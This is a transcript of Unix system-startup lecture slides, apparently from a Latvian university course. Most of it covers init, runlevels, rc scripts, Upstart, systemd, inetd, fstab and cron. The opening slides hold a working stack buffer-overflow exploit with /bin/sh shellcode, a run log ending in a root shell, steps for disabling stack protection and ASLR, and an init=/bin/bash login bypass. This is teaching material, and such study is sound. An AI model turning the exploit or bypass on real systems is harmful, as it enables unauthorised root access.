UNIX - SigmaNet | slideum.com

UNIX - SigmaNet

Transcript UNIX - SigmaNet

Unix Startup
Guntis Barzdins
Girts Folkmanis
Juris Krūmiņš
Artūrs Lavrenovs
Buffer Overflow
#include <stdio.h>
#include <string.h>
void show_array(int arrlen, char array[])
//Procedūra kurā notiek bufera pārpildīšanos
{
char buffer[32];
//Mainīgais caur kuru notiks ielaušanos
strcpy(buffer,array);
//Instrukcija, kas izraisa ielaušanos (atgriešanas
// adreses pārrakstīšanu)
printf("%s\n",buffer);
//Pēc šīs instrukcijas vadība tiek atdota shell kodam, jo
//pārrakstīta atgriešanas adrese
}
int main(int argc,char * argv[])
{
char *p;
int i;
long RET;
RET= 0x53535353;
// Mainīgais kurā tiks izvietota shell atrašanas adrese
char shellpre[] =
//Primitivas shell programmas kods asamblera "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
instrukcijas heksadecimālajā pierakstā
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
char mystr[1000];
// Mainīgais kurā glabājas speciāla virkne
strcpy(mystr,argv[1]);
//Tiek nolasīta argumenta vērtība mainīgā mystr
sprintf(mystr+strlen(argv[1])-31-36+1-strlen(shellpre),"%s",shellpre);
//Tiek pievienots shell kods
p=mystr;
//Mainīgais p tiek izmantots lai pārrakstītu atgriešanas adresi
RET = (long)((int)(&mystr)-(int)(19));
//Mainīgais kurā glabasies adrese uz atmiņā
printf("\nmystr adrese:\t0x(%x)\n",&mystr); // izvietotu shell heksadecimālajā pierakstā
printf("\nMainiga mystr adrese + nobide = shell koda atrasanas vieta:\t0x(%x)\n",(long)((int)(&mystr)-(int)(19)));
for(i=36;i<36+4;i+=4)
//Šeit notiek atgriešanas adreses pārrakstīšana uz shell koda atrašanas adresi
{
printf("\nAdrese uz kuru parlec programma pec buffera parpildisanos:\t0x(%x)\n\n",RET);
*(long*)(p+i)=RET;
//Atgriešanas adreses pārrakstīšana
}
show_array(0, mystr);
//Tiek izsaukta procedūra, kura izraisīs ielaušanos
return 0;
}
================================================================================================
g++ prob.cpp -o prob
VladimirsDebian:/home/vladimirs/Buffer_overflow/Test/Proba shell# ./prob `perl -e 'print "A"x150'`BBB
mystr adrese:
0x(bfda4663)
Mainiga mystr adrese + nobide = shell koda atrasanas vieta:
0x(bfda4650)
Adrese uz kuru parlec programma pec buffera parpildisanos:
0x(bfda4650)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPF‫ڿ‬AAAAAAAAAAAAAAAA1�1۰1�Ph//shh/bin��PS�ᙰ
sh-3.1#
//Tika nospiests 2 reizis TAB
Display all 1869 possibilities? (y or n)
//Izvelets „n”
sh-3.1# exit
exit
VladimirsDebian:/home/vladimirs/Buffer_overflow/Test/Proba shell#
//
Buffer Overflow
#include <unistd.h>
#define NOP 0x90
int main(int argc, char *argv[]){
//ievada strings tiek padots funkcijai
foo(argv[1]);
//Izrukas nav, ja funkcijaa foo ir mainita atgriesanas adrese
printf("Hello world!\n");
return 0;
}
void foo(char *tmp){
char buf[100];
int i;
//iekope ievada sakuma adresi
long *long_ptr = (long *)tmp;
//ieraksta sakot no 112. baita lidz 115. ieskaitot bufera adresi
//ievada sakuma bus NOP tapec nobide pa 2(var ari citu)
*(long_ptr + 28) = (int)&buf+2;
//buf 100 baitos kope 116 baitus, pedejos 4 tmp baitos ir jauna atgriesanas adrese
strcpy(buf,tmp);
//tiek izdrukats, jo funkcija vel nav beigusies
printf("Hello world2!\n")
}
Buffer Overflow
 Ar mūsdienu kompilatoriem programma jānokompilē ar
īpašu slēdzi -fno-stack-protector gcc komandrindā,
pretējā gadījumā nokopilētā programma pasargā steku,
un tajā mēģinot ierakstīt izmet kļūdu:
*** stack smashing detected ***: ./a.out terminated
 jāatslēdz adrešu telpas randomizācija, tāpēc izpildām
komandrindā komandu
“sysctl –w kernel.randomize_va_space”.
Init  Shell (1)
Jaunākajos linux distributīvos pie startēšanās ir iespējams norādīt boot opcijas.
Tās var ievadīt caur lilo konfigurācijas failu. Lilo bootloader(am), lai jaunās opcijas
tiktu ņemtas vērā, tās jāapstiprina ar lilo komandu.
Savukārt uz datora ar SUSE 10.2 ar Grub bootloader(i). startējoties ierakstām boot
opciju:
init=/bin/bash
Pēc kerneļa palaišanās tiešām tiek piestartēts bash shell(s). root partīcija ir
piemontēta read režīmā, pārējās partīcijas nav piemontētas vispār.
Vienkāršākais veids, kā panākt linux piestartēšanos, ir palaist skriptu /etc/rc.d/boot
Šis scripts palaiž visus skriptus, kas atrodas /etc/init.d un kuri sākas ar boot.xxxx.
Protams, var mēģināt arī ar roku pa vienam palaist šos boot.xxxx skriptus un
skatīties, kas notiks. Pēc /etc/rc.d/boot skripta izpildes ir piemontētas visas partīcijas
read/write režīmā.
Pēc šī skripta izpildes nepieciešams uzstādīt visus nepieciešamos ENVIRONMENT
VARIABLES (es to neizdarīju) un palaist pārējos skriptus, kas atrodas /etc/init.d/
zem attiecīgā runlevel. Ja neuzstāda ENVIRONMENT VARIABLES, tad shell(s)
stāsta, ka nevar atrast daudzas komandas, ja vēlas lai šīs komandas izpildītos, tad
jānorāda pilns ceļš uz tām.
Init  Shell (2)
Aizvietoju /sbin/init ar nokompilēto toyshell2.
To var darīt tikai “neejošai” sistēmai,
piemēram, datoru piestartējot no bootbale CD
un piemontējot atbilstošo HDD root partīciju
rediģēšanai. Dzīvā sistēmā aizvietojot init ar
citu programmu gan uz Linux sistemas, gan
FreeBSD abos gadījmos iestāj¯as kerneļa
panika un sistēmas darbība apstājas.
Var redzēt arī, kā inicializēju tīklu, ping-oju,
un apstādinu sistēmu. Šādā pašā variantā
konstatēju 15MB aizņemtās operatīvas
atmiņas, izmantojot komandu top. Un čaula
atvērās uzreiz pēc kodola pēdējā paziņojuma
119. rindiņā.
111 Begin: Running /scripts/localpremount
...
112 Done.
113 [19499.260388] kjournald starting. Commit interval 5 seconds
114 [19499.260405] EXT3fs:
mounted filesystem with ordered data mode.
115 Begin: Running /scripts/localbottom
...
116 Done.
117 Done.
118 Begin: Running /scripts/initbottom
...
119 Done.
120 #/#> /etc/init.d/mountkernfs.sh start
121 * Files under mount point '/var/run' will be hidden.
122 #/#> /etc/init.d/loopback start
123 * Starting basic networking... [ OK ]
124 #/#> /etc/init.d/networking start
125 * Configuring network interfaces... [ OK ]
126 #/#> [19525.523708] NET: Registered protocol family 10
127 [19525.523807] lo: Disabled Privacy Extensions
128
129 #/#> ping c
2 www.delfi.lv
130 #/#> PING www.delfi.lv (62.85.117.94) 56(84) bytes of data.
131 64 bytes from 62.85.117.94: icmp_seq=1 ttl=57 time=4.04 ms
132 64 bytes from 62.85.117.94: icmp_seq=2 ttl=57 time=5.78 ms
133
134 www.
delfi.lv ping statistics 135
2 packets transmitted, 2 received, 0% packet loss, time 1003ms
136 rtt min/avg/max/mdev = 4.041/4.910/5.780/0.872 ms
137
138 #/#> ifconfig
139 eth0 Link encap:Ethernet HWaddr 00:16:3E:00:01:03
140 inet addr:10.0.10.12 Bcast:10.0.10.255 Mask:255.255.255.0
141 inet6 addr: fe80::216:3eff:fe00:103/64 Scope:Link
142 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
143 RX packets:42 errors:0 dropped:0 overruns:0 frame:0
144 TX packets:19 errors:0 dropped:0 overruns:0 carrier:0
145 collisions:0 txqueuelen:1000
146 RX bytes:4727 (4.6 KiB) TX bytes:1466 (1.4 KiB)
147
148 lo Link encap:Local Loopback
149 inet addr:127.0.0.1 Mask:255.0.0.0
150 inet6 addr: ::1/128 Scope:Host
151 UP LOOPBACK RUNNING MTU:16436 Metric:1
152 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
153 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
154 collisions:0 txqueuelen:0
155 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
156
157 #/#>
176 #/#> halt f
177 #/#> [19734.414514] System halted.
System Lifecycle: Ups &
Downs
Power
on
Power
off
Boot
Kernel
Init
OS
Init
RUN!
Shut
down
Startup Sequence
Power-on
Boot
loader
LILO
Initialisation Scripts
Create
init
process
Linux
hardware
rc.sysinit
Load
Kernel
runlevel
0-6
rc.local
Ready
System initialization
 OS Initialization




Once the boot loader has loaded the OS image into memory,
control is transferred to the OS.
A large aspect of initialization for any operating system is the
establishment of virtual memory management. On an Intelbased system this typically involves setting up the Global
Descriptor Table (GDT), creating a Local Descriptor Table
(LDT), switching the processor into protected memory mode,
setting up page directories and enabling paging.
Additional tasks include device driver initialization and the
assignment of interrupts in the Interrupt Descriptor Table (IDT).
Another major initialization task is establishing support for
various file system types and mounting a root file system.
System initialization
 OS Initialization




The initial process must explicitly do for itself all the tasks
accomplished by a call to fork(). This initial process,
numbered 0 on UNIX systems.
Process 0 must be able to self-generate its own process
context. Once this context has been established, the system
has the capability to suspend and resume execution of
Process 0 just as it would any other process. Once
established, the role of Process 0 differs by operating
system.
Process 1, commonly referred to as the init process, is the
first process forked from Process 0.
Once Process 1 has been forked from Process 0, often a
number of additional kernel space processes are created to
handle additional kernel space tasks. Once all of these are
running, the kernel space operating system initialization is
complete.
System initialization
System initialization
1. A “pagedaemon” process to handle page swapping for
the virtual memory subsystem,
2. A “reaper” process to free the resources still allocated
to dead processes,
3. A “cleaner” process to clear out dirty buffers found in
the BQ_DIRTY buffer queue,
4. An “update” process for synchronizing the file systems,
5. An “aiodoned” process for handling completed
asynchronous I/O operations,
System initialization
Unix Process Hierarchy
[0]
/etc/inittab
Daemon
e.g. httpd
init [1]
Login shell
Child
Child
Grandchild
Child
Grandchild
init
When the kernel has started itself (has been loaded into memory, has
started running, and has initialised all device drivers and data structures
and such), it finishes its own part of the boot process by starting a user
level program, init. Thus, init is always the first process (its process
number is always 1).
The kernel looks for init in a few locations that have been historically used
for it, but the proper location for it (on a Linux system) is /sbin/init. If the
kernel can't find init, it tries to run /bin/sh, and if that also fails, the startup
of the system fails.
When init starts, it finishes the boot process by doing a number of
administrative tasks, such as checking filesystems, cleaning up /tmp,
starting various services, and starting a getty for each terminal and virtual
console where users should be able to log in.
pstree
Kernel threads, not real processes
Forked processes for network connections
Userspace system initialization
 Historically there were two initialization systems :


System V
BSD
 These two system differ with names, script running order,
directory hierarchy which hold initialization scripts.
 Linux systems mainly used System V initialization
system until recently.
Different Unix startup files..
 Unix systems are usually based in the
AT&T System III & V or BSD.







Sun Mircosystems Solaris 2.X (formally SunOS) BSD-ish
DEC OSF/1 is BSD-ish (DEC use to do Ultrix)
IBM AIX (neither ATT or BSD but something else)
HP HP-UX (BSD-ish)
Silicon Graphics, IRIX (ATTish)
SCO (Santa Cruz Operation) PC unix (ATT)
Linux, kernel from Linus Torvalds (BSD-ish for admin,
ATT-ish for programming)
 Distributions Slackware, Redhat, SuSE, Debian

other free PC Unixs, NetBSD, 386BSD, free BSD
Userspace system initialization
 Kernel start up root file system in ro mode and run init process
 As a result we have:
 ro file system
 init process
 The next system step initializing user space environment greatly
depends on init configuration file /etc/inittab
 It’s very important to understand that until this moment it doesn’t
matter what initialization system will be used.
Startup files
 How to start other services not in kernel?
 BSD mode

/etc/rc.boot, /etc/rc.single, /etc/rc and /etc/rc.local
 System V

Startup runlevels


init process and /etc/inittab file
On linux:
0: shutdown and halt
 1 single-user mode
 2 multiuse mode, no file sharing
 3 full multiuser.
 4 unused
 5 X windows console
 6 shuts down and reboots

Sample BSD Startup Scripts
/etc/rc.boot
 First rc script to run is /etc/rc.boot



The first two lines set HOME and PATH environment variables
Executes basic system commands during boot
hostname file in /etc for each network interface

enables IP networking on each interface
Sample BSD Startup Scripts
/etc/rc.boot (cont.)
 Address or hostname of default Internet gateway is read
from /etc/defaultrouter
 non-local NW connections up prior to more complicated
routing in boot process
 /usr filesystem read-only for system check to see if
/fastboot exists


Yes: system shut down cleanly~ filesystems in consistent state
No: all filesystems listed in /etc/fstab checked in fsck
 If disks check cleanly~ rc.boot runs /etc/rc.single
Sample BSD Startup Scripts
/etc/rc.single
 Commands in /etc/rc.single are executed at boot time
even if not using single mode
 Remounts / and /usr filesystems read/write

if not remounted~ system not able to come up
 Cleans out /etc/mtabfile and adds entries for / and /usr

was previously mounted but not in mtab file because root
filesystem not writable
 /usr/kvm mounted~ clean up shared library cache
Sample BSD Startup Scripts
/etc/rc.single
 /etc/utmp file cleaned out

contains user list of current log ins
 tzsetup command sets local time zone & status of daylight
savings time (kernal is GMT)
 loadkeys command sets keyboard mapping
 rc.single exits~rc.boot exits
 No problems in autoboot mode the next init process is
/etc/rc
 If problem~single-user (sh process) on console
Sample BSD Startup Scripts
/etc/rc
 /etc/rc is the main system startup up script in autoboot
after rc.boot

if single-user: rc after shell is terminated
 if root filesystems not writable~ rerun rc.single
 clean up shared library cache
 remove /fastboot file
 /etc/passwd file edited ~system crashes

vipw and /etc/rc script make sure password file not destroyed
at crash
Sample BSD Startup Scripts
/etc/rc (cont.)
 Enable quotas
 /bin/ps -u cleans out the ps database (status of processes)
 /etc/nologin created by shutdown to prevent logins during
shutdown
 executes rc.local script
 swapon -a to make use of all swap partitions listed in etc/fstab
 expreserve: looks in /tmp to find files that were edited when
system went down
 Start standard system daemons (i.e., lpd, inetd, update, uushed)
Sample BSD Startup Scripts
/etc/rc.local
 /etc/rc.local contains commands for local system
 portmap daemon maps RPC (remote procedure call)
service numbers to the NW ports of appropriate servers
 NIS (NW info service) Domain Name set from /etc/default
domain
 set subnet mask of all machines interfaces
 default route reset~ if no default routing daemon run
 list current configuration of NW interfaces on console
Sample BSD Startup Scripts
/etc/rc.local (cont.)
 All NFS filesystems mounted
 named (server for Domain Name system) maps between
hostnames and Internet addresses
 Client side NFS daemon run (biod)
 syslogd: responsible for managing log messages
 save kernel core dump in /var/crash/hostname

Image saved on swap partition~ save image to real filesystem
 Clean up temporary mail lock files and start sendmail
Sample BSD Startup Scripts
/etc/rc.local (cont.)
 Make machine NFS Server if filesystems need to be
exported
 Daemon to support diskless clients
 rpc.statd and rpc.lockd manage advisory locks on
NFS filesystems
 Start automount daemon
 3rd party vendor install scripts
 Appletalk protocol stack started
 Licensed software add-ons
BSD Startup Scripts
 Typically, BSD variants include a run control (also known as an rc) script
in the /etc directory.

This allows the administrator to edit a single /etc/rc script to make it start a
new service at boot time.
 Other BSD variants have simply increased the number of rc files in the
/etc directory.

For example, the FreeBSD start-up directory contains scripts with names
such as /etc/rc.atm, /etc/rc.firewall, and /etc/rc.network.


These individual scripts, respectively, configure the ATM network
cards, cause the system to become a firewall, and configure the network
links respectively.
These scripts are called by the master script, /etc/rc
FreeBSD today
init calls /etc/rc script
/etc/defaults/rc.conf contains hundreds of variables and
startup definitions (e.g. sendmail_enable="NO") for
startup scripts in /etc/rc.d/ (e.g. /etc/rc.d/sendmail)
/etc/rc.co nf overrides defaults and adds new
services, non base scripts located in /usr/local/etc/rc.d/
Keywords in rc scripts
– PROVIDE: name of service
– REQUIRE: list of service names required to be started
– BEFORE: execute before defined service names
Scripts ordered by dependencies but run serially
System V Run Levels
 Level 0 – shutdown
 Level 1 or S – single-user mode
 Level 2 thru 5 – multi-user mode
 Level 6 - reboot
System V initialization system
RHEL 4
BOOTFLAGS
It is possible to pass a number of flags to init from the boot monitor (eg. LILO). Init accepts
the following flags:
-s, S, single - Single user mode boot. In this mode /etc/inittab is examined and the bootup rc
scripts are usually run before the single user mode shell is started.
1-5 - Runlevel to boot into.
-b, emergency - Boot directly into a single user shell without running any other startup
scripts.
-a, auto - The LILO boot loader adds the word "auto" to the command line if it booted the
kernel with the default command line (without user intervention). If this is found init sets the
"AUTOBOOT" environment variable to "yes".
-z xxx - The argument to -z is ignored. You can use this to expand the command line a bit,
so that it takes some more space on the stack. Init can then manipulate the command line
so that ps(1) shows the current runlevel.
Startup Script Directories
 /etc/inittab tells init where scripts are
 /etc/init.d script directory
 /etc/rc2.d link to script directory
/etc/rc.d
[root@guntis-bio rc.d]# ls -l
total 112
drwxr-xr-x 2 root root
4096 Sep
-rwxr-xr-x 1 root root
2255 Sep 21
drwxr-xr-x 2 root root
4096 Sep
7 22:39 rc0.d
drwxr-xr-x 2 root root
4096 Sep
7 22:39 rc1.d
drwxr-xr-x 2 root root
4096 Sep
8 15:43 rc2.d
drwxr-xr-x 2 root root
4096 Sep
8 15:43 rc3.d
drwxr-xr-x 2 root root
4096 Sep
8 15:43 rc4.d
drwxr-xr-x 2 root root
4096 Sep
8 15:43 rc5.d
drwxr-xr-x 2 root root
4096 Sep
7 22:39 rc6.d
-rwxr-xr-x 1 root root
8 13:42 init.d
220 Jun 23
-rwxr-xr-x 1 root root 26613 Nov 10
[root@guntis-bio rc.d]#
2006 rc
2003 rc.local
2007 rc.sysinit
Linux Run Levels





Linux defines 7 run levels
Each run level defines a set of commands that are run to stop and start
processes.
The actual commands are held in /etc/init.d directory
The run level directories rc0.d, rc2.d…rc6.d contain links to the actual
commands
Each command is prefixed with S or K and a number 00-99
 S prefix means that a process should be started e.g.
S10network
 K prefix means that a process should be stopped (killed)
K70syslog
 The numbers determine the order in which the commands are run
from lowest first to highest last
Runlevel Commands
# ls /etc/rc2.d
K03samba
S42ncakmod
S81dodatadm.udaplt
K05volmgt
S47pppd
S89PRESERVE
K06mipagent
S65ipfboot
S89bdconfig
K07dmi
S69mrouted
S90wbem
K07snmpdx
S70sckm
S93cacheos.finish
K16apache
S70uucp
S94ncalogd
K27boot.server
S72autoinstall
S95ncad
README
S73cachefs.daemon
S95networker
S10lu
S75savecore
S98deallocate
S20sysetup
S80lp
S99audit
S40llc2
S80spc
Startup files
 Understanding /etc/inittab

Label:runlevel:action:process
id:5:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6
/etc/inittab
# The default runlevel is defined here
id:5:initdefault:
# what to do when CTRL-ALT-DEL is pressed
ca::ctrlaltdel:/sbin/shutdown -r -t 4 now
# First script to be executed
si::sysinit:/etc/rc.d/rc.sysinit
# getty-programs for the normal runlevels
# The "id" field MUST be the same as the
# last characters of the device name
1:2345:respawn:/sbin/mingetty --noclear
tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# /etc/init.d/rc takes care of
# runlevel handling
l0:0:wait:/etc/init.d/rc 0
l1:1:wait:/etc/init.d/rc 1
l2:2:wait:/etc/init.d/rc 2
l3:3:wait:/etc/init.d/rc 3
l4:4:wait:/etc/init.d/rc 4
l5:5:wait:/etc/init.d/rc 5
l6:6:wait:/etc/init.d/rc 6
ls:S:wait:/etc/init.d/rc S
Some Linux inittab action valus
Action
Meaning
Boot
Runs when system boots
Bootwait
Init waits for complete
Ctrlaltdel
ctrl+alt+delete
Initdefault
Set the default runlevel
off
Disable the entry
Once
For every runlevel
Powerfail
When init receive SIGPWR signal
Powerokwait
SIGPWR and /etc/powerstatus has ok
Respawn
Restart the process whenever it terminates
Sysinit
Before any boot
Wait
Upon entering the run mode and waits to
complete
Linux startup - rc.sysinit script
 /etc/rc.d/rc.sysinit - does a range of basic tasks including
 configures networking
 sets host name
 checks the root file system for repairs
 check root file system quota & turns quotas for groups and
users
 mount non-root file systems and checks them for repairs
 turns on swapping (virtual memory subsystem)
 checks and loads modules (drivers)

(see /var/log/messages)
init scripts start other processes
/etc/rc.d/rc5.d
K35smb
K35vncserver
K35winbind
K50netdump
K50snmptrapd
K73ypbind
K74nscd
S50snmpd
S55cups
S55sshd
S56rawdevices
S56xinetd
S58ntpd
S60nfs
/etc/init.d
cups
netdump
nfs
nscd
ntpd
rawdevices
smb
Scripts for each runlevel snmpd
are symbolic links to their / snmptrapd
etc/init.d counterpart
sshd
vncserver
winbind
xinetd
ypbind
K = Kill
S = Start
The system first runs the scripts whose names start with K to kill the
associated processes  /etc/rc.d/init.d/<command> stop
Then system runs the scripts whose names start with S to start the
processes  /etc/rc.d/init.d/<command> start
System V initialization system
RHEL 4
[juris@ns1 rc4.d]$ pwd
/etc/rc.d/rc4.d
[juris@ns1 rc4.d]$ ls –l
...
lrwxrwxrwx 1 root root 19 Jun 2 2005 K05saslauthd -> ../init.d/saslauthd
lrwxrwxrwx 1 root root 13 Jun 2 2005 K20nfs -> ../init.d/nfs
lrwxrwxrwx 1 root root 14 Jun 2 2005 K24irda -> ../init.d/irda
lrwxrwxrwx 1 root root 15 Jun 2 2005 K25squid -> ../init.d/squid
lrwxrwxrwx 1 root root 16 Jun 2 2005 S09pcmcia -> ../init.d/pcmcia
lrwxrwxrwx 1 root root 16 Jun 2 2005 S40smartd -> ../init.d/smartd
lrwxrwxrwx 1 root root 14 Jun 2 2005 S55sshd -> ../init.d/sshd
lrwxrwxrwx 1 root root 16 Aug 11 2005 S55sshdlp -> ../init.d/sshdlp
...
lrwxrwxrwx 1 root root 15 Jun 2 2005 S97rhnsd -> ../init.d/rhnsd
lrwxrwxrwx 1 root root 11 Jun 15 2005 S99local -> ../rc.local
[juris@ns1 rc4.d]
Benefits of init Scripts
 One of the benefits of using init directory scripts is that
they are easily tested.


The scripts may be manually invoked with the stop and start
arguments as a check to determine whether they function
correctly before creating the links to the rc directories, and
trying them under actual system boot conditions.
This procedure is recommended because it can help you
catch mistakes that might interrupt the boot process and
leave the system unusable.
Changing Run Levels
 The following commands are typically reserved for
system maintenance activities.



UNIX shutdown Command
The System V init 0 Command
The telinit Command

NOTE: The shutdown, telinit, and init 0 commands can only be
executed with root access.
Linux Run Levels 0-2
 Runlevel 0 Directory /etc/rc.d/rc0.d

Actually shutdown sequence



Kill all processes
Turn off virtual memory system (i.e. swap partition)
unmounts swap and file systems
 Runlevel 1 /etc/rc.d/rc1.d


single user mode
used for maintenance by system administrators when they
need sole control of machine, e.g. reconfiguring hardware
installing software
 Runlevel 2 /etc/rc.d/rc2.d

Multi-user + networking (minus NFS)
Linux Run level 3-6
 Runlevel 3 /etc/rc.d/rc3.d


Default run level
multi-user + NFS
 Runlevel 4 /etc/rc.d/rc4.d

not defined ( available for customization)
 Runlevel 5 /etc/rc.d/rc5.d

Same as 3 under Redhat but includes starting X windows
 Runlevel 6 /etc/rc.d/rc6.d


reboot
similar to 0 but allows option to shutdown (halt) or reboot
Linux today
 Why not SysV init?


It launches daemons only serially so it's slow
Also potential for hang-ups, overhead, etc.
 World's most popular Linux distribution Ubuntu
developed its own event-based initialization system
Upstart. Currently used as default by Ubuntu, RHEL6,
Chrom(-e/-ium) OS, etc.
 Everyone else (Debian, Arch, Fedora, openSUSE, etc.)
moves to dependency-based init system systemd
Upstart
Emits events which services can register an interest in
When an event/combination of events is emitted that
satisfies some service's requirements, Upstart will
automatically start or stop that service
If multiple jobs have the same "start on" condition,
Upstart will start those jobs ''in parallel''
Biggest advantage is ability to handle kernel events like
udev new devices (no other common init can)
Ability to run user session and manage graphical
session (replace gnome-session as of Ubuntu 13.10)
Socket event allows replacement of inetd/xinetd
Upstart - Jobs
A "unit of work" - generally either a "Task" or a "Service".
Jobs are defined in /etc/init/*.conf files
Backwards compatibility:
# /etc/init.d/mysql stop
Rather than invoking init scripts through /etc/init.d, use the service(8) utility, e.g. service
mysql stop
Since the script you are attempting to invoke has been converted to an Upstart job, you may
also use the stop(8) utility, e.g. stop mysql
mysql stop/waiting
# ls -lt /etc/init.d/mysql
lrwxrwxrwx 1 root root 21 Jul 24 06:47 /etc/init.d/mysql -> /lib/init/upstart-job
Upstart - Events
Well known events
startup – first event emited, triggers system initialization
Many events emited by jobs, software, kernel
Emited by job state transition
starting - when a job is about to start executing
started - when a job is now running
stopping - when a job is about to be stopped
stopped - when a job has completed
Job defined event
emits desktop-shutdown
initctl emit desktop-shutdown
Upstart - Events
Jobs listen for events
start|stop on EVENT [[KEY=]VALUE]... [and|or...]
start on starting apache2
stop on stopped apache2
Emulation of SysV runlevels, common use in jobs
start on runlevel [2345]
stop on runlevel [!2345] / stop on runlevel [016]
/etc/init/rc-sysinit.conf
start on (filesystem and static-network-up) or failsafeboot
emits runlevel
Upstart - Startup Process I
1) Upstart performs its internal initialization.
2) Upstart itself emits a single event called startup. This
event triggers the rest of the system to initialize.
3) init runs a small number of jobs which specify
condition “start on startup”. The most notable of these is
the mountall job which mounts your disks and
filesystems.
4) The mountall job in turn emits a number of events.
These include local-filesystems, virtual-filesystems and
all-swaps. See upstart-events for further details.
5) The virtual-filesystems event causes the udev job to
Upstart - Startup Process II
7) The upstart-udev-bridge job will at some point emit the "net-device-up
IFACE=lo" event signifying the local network (for example, 127.0.0.0 for
IPv4) is available.
8) After the last filesystem is mounted, mountall will emit the filesystem
event.
9) Since the start on condition for the rc-sysinit job is “start on filesystem and
net-device-up IFACE=lo” Upstart will then start the rc-sysinit job.
10) The rc-sysinit job calls the telinit command, passing it the runlevel to
move to “telinit 2”
11) The telinit command emits the runlevel event as “runlevel RUNLEVEL=2
PREVLEVEL=N”. That this is all the telinit command does – it runs no
commands itself to change runlevel!
12) The runlevel event causes many other Upstart jobs to start, including
/etc/init/rc.conf which starts the legacy SystemV init system.
start on runlevel [0123456]
Upstart – Example /etc/init/ssh.conf
description "OpenSSH server"
start on filesystem or runlevel [2345]
stop on runlevel [!2345]
respawn
respawn limit 10 5
umask 022
console none
systemd
Dependency based, runs in parallel everything it
can.
Advertises itself as solution for all Upstart
problems. Main of which is not being developed by
Canonical.
Provides a replacement for sysvinit, pm-utils,
inetd, acpid, syslog, watchdog, cron and atd.
Declarative configuration files rather than a shell
scripts.
systemd
systemd example - /usr/lib/systemd/system/redmine.service
[Unit]
Description=Redmine server
After=syslog.target
After=network.target
[Service]
Type=simple
User=user
Group=user
ExecStart=/bin/ruby /home/user/script/rails server webrick
-e production
Shutdown
 shutdown allows...



users to be warned the systems is going down
the contents of disk caches to be written to disk
file systems to be marked as having been closed properly
(avoid file system check on next startup)
 Access to the shutdown command is restricted (it is in
/sbin)
 eg shutdown -h now
h = halt
r = reboot
Internet Daemon
 Daemon inetd started at boot time
 Configuration file /etc/inetd.conf

Name, type, protocol, wait-status, uid, server,
arguments
#
ftp
stream
tcp6
nowait
root
/usr/sbin/tcpd
in.ftpd
telnet
stream
tcp6
nowait
root
/usr/sbin/tcpd
in.telnetd
#
# Mail is a useful thing...
pop3
stream
tcp
nowait
root
/etc/mail/popper
popper -s
imap
stream
tcp
nowait
root
/etc/mail/imapd
imapd
Internet Daemon
 When to modify inetd.conf

Disable a service
Add a # at the beginning of the entry
 Send hang-up to inetd

kill –HUP processid



Enable a service
Change the path
Modify arguments
Extended Internet Daemon
 Daemon xinetd
 Configuration file /etc/xinetd.conf and /etc/xinetd.d


Attribute/value pair
Diable = yes/no
Setup automatic Mounting
/etc/fstab
/etc/vfstab
# Device
Mpoint FStype Opt Dump Pass
/dev/sd01sf /new ufs rw 0 2
/dev/da0b none swap sw 0 0
/etc/fstab
 Configuration file for all partitions known to the system.
 Entry format:
/dev/device /dir/to/mount fstype
parameters fs_freq fs_passno
Sample entry:
/dev/hda10 /tmp ext2 defaults 1 2
 For entries in /etc/fstab, can run mount command with just mount
point:
> mount /tmp
To mount all file systems:
> mount -a
Sample Directory Tree with
Mount Points
/
/d e v /h d a 9
/b o o t
/d e v /h d a 1
/u s r
/d e v /h d a 5
/h o m e
/d e v /h d a 6
sw ap
/d e v /h d a 7
/v a r
/d e v /h d a 8
Mounting and Unmounting File
Systems
 File Systems mounted with the mount command:
mount [options] device directory
For example:
mount –o rw –t ext2 /dev/hda10 /tmp
 File systems umounted with the umount command:
umount [-f] directory
For example:
umount /tmp
 File systems should only be umounted when they are not in use.
Scheduling processes - cron

Many aspects of system administration require things to be
done on a routine basis







Rotating logs
building help files
checking disk space
checking permissions
Remembering to do thing is error prone
Unix provides scheduling mechanism refereed to as cron.
Cron has two parts


Daemon - crond
table of actions /etc/crontab
Cron
 the crond Daemon is started at boot time
 the daemon ‘wakes up’ every minute to check its table
of actions


if their is something to do -> run command
if nothing to do --> go back to sleep for 1 min
 User Cron table is a list (time,command) pairs. The
format is
 minute hour day month dayofweek command
 System Cron table is a list (time,user,command)
triples.
Crontab
 Commands can be scheduled by





minute (0 59)
Hour ( 0 to 23)
Day of the month (1 - 31)
Month ( 1 to 12)
Day of the week (0=Sunday 6 = sat, or use mon,tues,wed)
 Example
01 * * * *
* 1 * * *
04 1 * * *
dayevery’
* means ‘check
commnd2
# hourly at 1 minute past
commnd2
# daily at 1 am
commands 3 - run at 4 minute past
1 each
Cron
 Under Redhat Linux the cron table is used to execute a
set of commands in some special directories


/etc/cron.hourly
/etc/cron.daily



contains logrotate, makewhatis,slocate,tmpwatch
/etc/cron.weekly
/etc/cron.monthly

You can add you own commands to the appropriate directory, but
remember they need to be ‘batch’ commands as they will run
automatically
Crontab Files





Minute 0-59
Hour 0-23
Day 1-31
Month 1-12
Weekday 0-6 (0=Sunday)



* Matches everything
1-3 Matches range
1,5 Matches Series
 Special strings - @hourly (same as 0 * * * *), @daily, @weekly,
@monthly, @yearly, etc.
 Most special of all @reboot
Examples
15,45 10 * * 1-5
write garth % Hi Garth % get a job
30 2 * * 1 (cd /user/joe/p; make)
find /tmp –atime +3 –exec rm –f {} ‘;’
 Output mailed to owner of crontab file
crontab commands
User crontab
 crontab
Replace ^C exit
 crontab –l List
 crontab –e Edit
 crontab –l > cronfile
 crontab cronfile


cron.allow - If this file exists, it must contain
